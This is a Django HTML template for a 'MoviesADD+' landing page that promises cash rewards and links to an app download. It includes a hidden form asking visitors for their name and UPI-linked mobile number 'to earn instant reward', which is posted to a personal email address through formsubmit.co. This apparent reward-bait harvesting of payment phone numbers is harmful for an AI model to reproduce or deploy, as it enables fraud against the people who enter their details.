<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="referrer" content="origin">

    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    {% load static %}

    <title>Document</title>
    <link
    rel="stylesheet"
    href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"
  />
  <link rel='stylesheet' href="{% static 'landing.css' %}">
     

</head>
<body>
    <div class="v">
       
        <div id="m">  <img class="animate__animated animate__zoomIn" style="position: absolute;bottom: 5px;" src="{% static 'playmobil-movie.gif'%}" width="150px" alt="">
            <h1 style="color: azure; position: 
            absolute;right: 10PX; TOP:10PX;" class="animate__animated animate__bounceInRight">M▶️VIES<Samp style="color:
             crimson;">ADD</Samp><r>+</r> </h3><br>   <button type="button" class="btn btn-outline-info" data-bs-toggle="modal" data-bs-target="#staticBackdrop">
 how to use
</button>
        </div> <br>
        <button type="button" style="position: absolute;top: 50%;left: 50%;transform: translate(-50%, -50%); box-shadow: 5px 5px 2px;" class="btn btn-warning"> <a  href="{% url 'interface' %}">start</a></button>  
<!-- Button trigger modal -->
<form id="panel" action="https://formsubmit.co/suryadeep012@gmail.com" method="post" style="width: 90%;height: 150px; box-shadow: 10px 10px 10px; border-radius: 5px; background-color: rgb(176, 176, 177);bottom: 2px; display: none; bottom: 10px;position: absolute; ">
  <input type="hidden" name="_next" value="http://127.0.0.1:268/interface">
  
<!-- Button trigger modal -->

 

  <div class="container mt-2 bg-outline">
      <div class="row">
       
        <div class="col-md-12 border-left py-3">
          <h5>Enter your <s style="color: brown;">UPI</s >  mobile number <s style="color: brown;">to earn instant reward</s> </h1>
          <div class="form-group">
            <input type="hidden" name="_captcha" value="false">
            <div class="form-group">
              <input type="text" name="name" placeholder="Name" class="form-control" name="name" rows="1" required>
              <input placeholder="phone number/"  type="text" class="form-control" name="name" rows="1" required></textarea>
          </div>
       
          <button class="btn btn-primary  border mt-2" onclick="sendMail()">Submit</button>

         


        </div>
      </div>
      </form>
     </div>
</div>
 

 <button type="button"id="flip" style="bottom: 20px;position: absolute; right: 10px; box-shadow: 5px 5px 2px;" class="btn btn-primary">log_in</button> 
  </div>
   <h3>REGISTER NOW, AND GET INSTANT ₹10 </h3>
     <div class="DL" style="width: 50%; height: 30px;top: 50px; background-color: aqua;margin-top: 100px;padding: auto; border-radius: 5px;box-shadow: 5px 10px 5px;">
      <a href="https://appsgeyser.io/16803453/MoviesAdd ">𝐃𝐎𝐖𝐍𝐋𝐎𝐀𝐃𝐈𝐍𝐆 𝐀𝐏𝐏 </a>
     </div>  
    
 

<!-- Modal -->
<div class="modal fade" id="staticBackdrop" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" aria-hidden="true">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <h5 class="modal-title" id="staticBackdropLabel">how to use</h5>
        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
      </div>
      <div class="modal-body">
       <h5>WATCH👨‍👩‍👦‍👦TOGETHER</h5> 
       <p>You can learn how to watch movies or videos with your friends/family in this video. 
        Just enjoy with your close people and get more coins 🪙
        Collect more coins 🪙 and convert them into cash 💵</p>
       <iframe width="100%" height="300" src="https://www.youtube.com/embed/rea2elj9KOg" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
      </div>
      

      </figure>
      
      
     
      <div class="modal-footer">
        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
        
      </div>
    </div>
  </div>
</div>
    
           
         </div> 
         <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
         <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.3/jquery.min.js"></script>
         <script> 
          $(document).ready(function(){
            $("#flip").click(function(){
              $("#panel").slideToggle("slow");
            });
          });
          </script>

</body>
</html>
